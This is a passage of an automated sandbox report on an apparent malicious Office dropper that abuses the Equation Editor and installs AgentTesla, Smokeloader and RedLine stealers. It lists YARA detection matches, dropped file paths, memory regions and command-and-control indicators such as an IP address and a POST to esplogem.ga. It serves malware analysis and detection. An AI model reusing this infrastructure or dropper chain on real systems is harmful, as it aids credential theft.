34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: unknownTCP traffic detected without corresponding DNS query: 192.227.132.49
              Source: EQNEDT32.EXE, 00000005.00000002.922504218.00000000005C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.comA equals www.linkedin.com (Linkedin)
              Source: explorer.exe, 0000000B.00000000.970463322.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
              Source: EQNEDT32.EXE, 00000005.00000002.922504218.00000000005C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
              Source: A173.exe, 0000001B.00000002.1200913280.0000000006584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
              Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ygujr.net/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: esplogem.ga
              Source: unknownHTTPS traffic detected: 3.232.242.170:443 -> 192.168.2.22:49177 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: Yara matchFile source: 00000014.00000002.1192013184.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.1191957293.0000000000081000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2196, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1780, type: MEMORYSTR
              Source: Yara matchFile source: 25.2.efbhiii.2215a0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.0.regasm.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.0.regasm.exe.400000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.0.regasm.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.regasm.exe.1b15a0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.0.efbhiii.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.efbhiii.1b15a0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.efbhiii.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.efbhiii.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.0.efbhiii.400000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.regasm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.0.efbhiii.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.980755023.00000000003C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.1038285242.00000000003D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.980633512.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.1148403821.0000000000341000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.1038072126.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.1148349455.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000000.969363359.00000000028C1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Source: webSettings.xml.rels, type: SAMPLEMatched rule: Detects XML web frame relations refrencing an external target in dropper OOXML documents Author: ditekSHen
              Source: 15.2.A173.exe.31d2a10.2.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
              Source: 15.2.A173.exe.31d2a10.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 15.2.A173.exe.31d2a10.2.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
              Source: 15.2.A173.exe.31d2a10.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 15.2.A173.exe.31aa9f0.3.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
              Source: 15.2.A173.exe.31aa9f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 27.0.A173.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
              Source: 27.0.A173.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 15.2.A173.exe.3222a30.4.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
              Source: 15.2.A173.exe.3222a30.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 15.2.A173.exe.3222a30.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
              Source: 15.2.A173.exe.3222a30.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 00000009.00000002.980755023.00000000003C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 0000000E.00000002.1038285242.00000000003D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 00000009.00000002.980633512.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 0000001A.00000002.1148403821.0000000000341000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 0000000E.00000002.1038072126.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 00000007.00000002.928771662.00000000002D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
              Source: 00000015.00000000.1045681304.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 00000010.00000000.1030255101.0000000000190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 00000019.00000002.1137718411.0000000000668000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
              Source: 0000000F.00000002.1154252992.0000000003192000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 0000000D.00000002.1022592251.0000000000298000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
              Source: 0000001B.00000000.1142718218.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 0000000F.00000002.1148519214.0000000002216000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 00000013.00000000.1039506487.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 0000001A.00000002.1148349455.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 0000000F.00000002.1153618394.0000000003141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 0000000F.00000002.1155901803.0000000003222000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 00000012.00000000.1036314338.00000000000D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 0000000B.00000000.969363359.00000000028C1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: Process Memory Space: A173.exe PID: 260, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: Process Memory Space: A173.exe PID: 1300, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0000_000000_00000[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F43FFB53.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\regasm.exeJump to dropped file
              Source: 27.0.A173.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b5AD43519u002d45F6u002d41F4u002dB8AAu002d4EAC55A96D04u007d/u0035CB5ECA5u002dED2Au002d4E2Bu002d9889u002dDD766D37F531.csLarge array initialization: .cctor: array initializer size 11171
              Source: C:\Users\Public\regasm.exeCode function: 7_2_004144187_2_00414418
              Source: C:\Users\Public\regasm.exeCode function: 7_2_0040DC2A7_2_0040DC2A
              Source: C:\Users\Public\regasm.exeCode function: 7_2_00413D207_2_00413D20
              Source: C:\Users\Public\regasm.exeCode function: 7_2_0040AD397_2_0040AD39
              Source: C:\Users\Public\regasm.exeCode function: 7_2_00416A8C7_2_00416A8C
              Source: C:\Users\Public\regasm.exeCode function: 7_2_004132987_2_00413298
              Source: C:\Users\Public\regasm.exeCode function: 7_2_004153697_2_00415369
              Source: C:\Users\Public\regasm.exeCode function: 7_2_004137DC7_2_004137DC
              Source: C:\Users\user\AppData\Local\Temp\A173.exeCode function: 15_2_042CE48815_2_042CE488
              Source: C:\Users\user\AppData\Local\Temp\A173.exeCode function: 15_2_042CF71015_2_042CF710
              Source: C:\Users\user\AppData\Local\Temp\A173.exeCode function: 15_2_042CEF2015_2_042CEF20
              Source: C:\Users\user\AppData\Local\Temp\A173.exeCode function: 15_2_042C392815_2_042C3928
              Source: C:\Users\user\AppData\Local\Temp\A173.exeCode function: 15_2_042C391915_2_042C3919
              Source: C:\Users\user\AppData\Local\Temp\A173.exeCode function: 15_2_047232E015_2_047232E0
              Source: C:\Users\user\AppData\Local\Temp\A173.exeCode function: 15_2_0472524115_2_04725241
              Source: C:\Users\user\AppData\Local\Temp\A173.exeCode function: 15_2_047232D015_2_047232D0
              Source: C:\Users\user\AppData\Local\Temp\A173.exeCode function: 15_2_0475688915_2_04756889
              Source: C:\Users\user\AppData\Local\Temp\A173.exeCode function: 15_2_0499641015_2_04996410
              Source: C:\Users\user\AppData\Local\Temp\A173.exeCode function: 15_2_04A32D9715_2_04A32D97
              Source: C:\Users\user\AppData\Local\Temp\A173.exeCode function: 15_2_04A31BF015_2_04A31BF0
              Source: C:\Users\user\AppData\Local\Temp\A173.exeCode function: 15_2_04A3348015_2_04A33480
              Source: C:\Users\user\AppData\Local\Temp\A173.exeCode function: 15_2_04A3347115_2_04A33471
              Source: C:\Users\user\AppData\Local\Temp\A173.exeCode function: 15_2_04A32EF315_2_04A32EF3
              Source: C:\Users\user\AppData\Local\Temp\A173.exeCode function: 15_2_04A31BE015_2_04A31BE0
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0012230816_2_00122308
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0012C10716_2_0012C107
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0013B16A16_2_0013B16A
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0017424616_2_00174246
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0013B78C16_2_0013B78C
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_00126C7816_2_00126C78
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_00145D1616_2_00145D16
              Source: C:\Windows\explorer.exeCode function: 17_2_00061E2017_2_00061E20
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_000C170B18_2_000C170B
              Source: C:\Windows\explorer.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: devrtl.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and writeJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and writeJump to behavior
              Source: C:\Users\Public\regasm.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
              Source: C:\Users\Public\regasm.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
              Source: C:\Users\Public\regasm.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
              Source: C:\Users\Public\regasm.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\efbhiiiMemory allocated: 77620000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\efbhiiiMemory allocated: 77740000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\efbhiiiMemory allocated: 77620000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\efbhiiiMemory allocated: 77740000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\A173.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 77620000 page execute and read and write
              Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 77740000 page execute and read and write
              Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 77620000 page execute and read and write
              Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 77740000 page execute and read and write
              Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 77620000 page execute and read and write
              Source: C:\Windows\SysWOW64\explorer.exeMemory allocated: 77740000 page execute and read and write
              Source: C:\Users\user\AppData\Roaming\efbhiiiMemory allocated: 77620000 page execute and read and write
              Source: C:\Users\user\AppData\Roaming\efbhiiiMemory allocated: 77740000 page execute and read and write
              Source: C:\Users\user\AppData\Roaming\efbhiiiMemory allocated: 77620000 page execute and read and write
              Source: C:\Users\user\AppData\Roaming\efbhiiiMemory allocated: 77740000 page execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\A173.exeMemory allocated: 77620000 page execute and read and write
              Source: C:\Users\user\AppData\Local\Temp\A173.exeMemory allocated: 77740000 page execute and read and write
              Source: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exeMemory allocated: 77620000 page execute and read and write
              Source: C:\Users\user\AppData\Roaming\Novwfcwb\Wlrfmqer.exeMemory allocated: 77740000 page execute and read and write
              Source: webSettings.xml.rels, type: SAMPLEMatched rule: INDICATOR_XML_WebRelFrame_RemoteTemplate author = ditekSHen, description = Detects XML web frame relations refrencing an external target in dropper OOXML documents
              Source: 15.2.A173.exe.31d2a10.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
              Source: 15.2.A173.exe.31d2a10.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 15.2.A173.exe.31d2a10.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
              Source: 15.2.A173.exe.31d2a10.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 15.2.A173.exe.31aa9f0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
              Source: 15.2.A173.exe.31aa9f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 27.0.A173.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
              Source: 27.0.A173.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 15.2.A173.exe.3222a30.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
              Source: 15.2.A173.exe.3222a30.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 15.2.A173.exe.3222a30.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
              Source: 15.2.A173.exe.3222a30.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 00000009.00000002.980755023.00000000003C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 0000000E.00000002.1038285242.00000000003D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 00000009.00000002.980633512.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 0000001A.00000002.1148403821.0000000000341000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 0000000E.00000002.1038072126.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 00000007.00000002.928771662.00000000002D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
              Source: 00000015.00000000.1045681304.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 00000010.00000000.1030255101.0000000000190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
